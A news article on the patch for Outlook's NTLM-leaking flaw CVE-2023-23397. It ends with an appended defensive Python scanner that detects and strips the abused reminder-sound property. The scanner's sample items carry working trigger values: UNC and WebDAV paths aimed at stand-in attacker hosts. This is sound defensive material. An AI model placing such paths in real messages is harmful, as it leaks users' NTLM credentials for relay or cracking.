Microsoft Releases Updates to Patch Critical Outlook NTLM Vulnerability


Microsoft has released patches to address a critical security flaw in Outlook for Windows. The company confirmed that a Russia-based threat actor exploited the NTLM vulnerability against European organizations, military ones among them, during 2022.

The zero-day flaw (CVE-2023-23397) was reported to Microsoft by Ukraine’s Computer Emergency Response Team (CERT-UA). Microsoft classifies it as an elevation-of-privilege vulnerability with a CVSS score of 9.8 (critical), and it affects all supported versions of Outlook for Windows.

Essentially, the vulnerability lets a remote attacker send a specially crafted email that makes the victim’s Outlook client authenticate to an attacker-controlled server. No user interaction is required: the trigger fires when Outlook retrieves and processes the message, before it is opened or even shown in the preview pane. NTLM (New Technology LAN Manager) is the legacy challenge-response authentication protocol family used in Windows domains. What leaks is not the stored password hash itself but the user’s Net-NTLMv2 response, which the attacker can relay to another service that accepts NTLM authentication, or attempt to crack offline to recover the password.

“CVE-2023-23397 is a critical EoP vulnerability in Microsoft Outlook that is triggered when an attacker sends a message with an extended MAPI property with a UNC path to an SMB (TCP 445) share on a threat actor-controlled server,” Microsoft explained. “The connection to the remote SMB server sends the user’s NTLM negotiation message, which the attacker can then relay for authentication against other systems that support NTLM authentication.”

It is important to note that Outlook on the web does not use NTLM to authenticate users and is therefore not affected. Microsoft has confirmed that the vulnerability only impacts the Outlook for Windows desktop client.

Microsoft details mitigation strategies to block Outlook NTLM attacks

Microsoft recommends that customers install the latest security update for Outlook for Windows, which is the only complete fix. Where patching is delayed, administrators can block outbound TCP 445 (SMB) at the perimeter and host firewalls and in VPN configurations, which stops the client from reaching the attacker’s share in the first place.

Microsoft also advises adding on-premises accounts to the Protected Users security group, which prevents those accounts from authenticating with NTLM at all; the caveat is that this can break applications that still depend on NTLM, so test before rolling it out broadly. The company has also published a PowerShell script that scans mail, calendar and task items in on-premises Exchange and Exchange Online for the abused property and can remove or clean up the suspicious items it finds.
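As an added example that is not Microsoft’s script and not code from the original article, the following Python sketches the check such a scan performs for the trigger described above: it inspects the MAPI named property the exploit abuses, PidLidReminderFileParameter, flags any value that would make Outlook open a path on a remote host (plain UNC, the long-path UNC form, WebDAV host@port forms and file:// URLs, while leaving local sound files alone), and strips it from the item. The property names are the real MAPI identifiers; the MailItem structure, the sample mailbox and the hosts in it are constructed stand-ins for whatever EWS, MAPI or Graph objects you actually read.

```python
import re
from dataclasses import dataclass
from typing import Optional

# MAPI named properties abused by CVE-2023-23397. The crafted message sets
# PidLidReminderFileParameter (PSETID_Appointment, dispid 0x851F) to a UNC path
# and PidLidReminderOverride (0x851C) to TRUE, so when the reminder fires Outlook
# opens the "custom sound file" over SMB (or WebDAV) and sends the user's NTLM
# negotiation to whichever host the path names.
REMINDER_FILE_PARAM = "PidLidReminderFileParameter"
REMINDER_OVERRIDE = "PidLidReminderOverride"

# After normalising "\" to "/", every remote form Windows accepts starts with
# "//host/": plain UNC (\\host\share), the long-path form (\\?\UNC\host\share)
# and the file://host/share URL form. file:///C:/... has an empty host.
_REMOTE_RE = re.compile(r"^(?:file:)?//(?:\?/UNC/)?([^/]+)(?:/|$)", re.IGNORECASE)


def remote_host(path: Optional[str]) -> Optional[str]:
    """Host a reminder-sound path would make Outlook connect to, or None if the
    path is local (drive letter, long-path local form, device path, empty)."""
    if not path:
        return None
    m = _REMOTE_RE.match(path.strip().replace("\\", "/"))
    if not m:
        return None
    host = m.group(1)
    if host in ("?", "."):            # \\?\C:\... and \\.\... are local device paths
        return None
    # WebDAV forms carry the port or SSL flag in the host: \\evil@SSL\, \\evil@8080\
    return host.split("@", 1)[0].lower()


@dataclass
class MailItem:
    """Hypothetical stand-in for a mail/calendar/task item; props holds the
    item's MAPI named properties as {property name: value}."""
    subject: str
    sender: str
    props: dict


@dataclass
class Finding:
    subject: str
    sender: str
    host: str      # indicator to block at the firewall and hunt for in SMB/auth logs
    path: str


def scan(items):
    """Return a Finding for every item whose reminder sound points at a remote host."""
    findings = []
    for item in items:
        path = item.props.get(REMINDER_FILE_PARAM)
        host = remote_host(path)
        if host is not None:
            findings.append(Finding(item.subject, item.sender, host, path))
    return findings


def neutralize(item):
    """Strip a remote reminder-sound path from an item so the reminder can no
    longer trigger an outbound authentication. Returns the removed path, or
    None when the item was not suspicious (a local sound file is left alone)."""
    if remote_host(item.props.get(REMINDER_FILE_PARAM)) is None:
        return None
    item.props[REMINDER_OVERRIDE] = False
    return item.props.pop(REMINDER_FILE_PARAM)


# Constructed sample mailbox. Hosts are documentation names/addresses, not real IOCs.
SAMPLE_ITEMS = [
    MailItem("Team sync", "alice@corp.example",
             {REMINDER_OVERRIDE: True, REMINDER_FILE_PARAM: r"C:\Windows\Media\Alarm01.wav"}),
    MailItem("Invoice overdue", "billing@attacker.example",
             {REMINDER_OVERRIDE: True, REMINDER_FILE_PARAM: r"\\192.0.2.10\share\alert.wav"}),
    MailItem("Delivery notice", "noreply@attacker.example",
             {REMINDER_OVERRIDE: True, REMINDER_FILE_PARAM: r"\\evil.example@80\dav\s.wav"}),
    MailItem("Lunch?", "bob@corp.example", {}),
    MailItem("Long path", "carol@corp.example",
             {REMINDER_OVERRIDE: True, REMINDER_FILE_PARAM: r"\\?\C:\Windows\Media\x.wav"}),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_ITEMS):
        print(f"SUSPICIOUS {f.subject!r} from {f.sender}: {f.path} -> host {f.host}")
```

Running the block reports the two items pointing at 192.0.2.10 and evil.example and ignores the local and long-path-local sound files; the host each finding extracts is the value to feed into firewall blocks and to search for in SMB and NTLM authentication logs, since any client that already processed the message has most likely sent its Net-NTLMv2 response there.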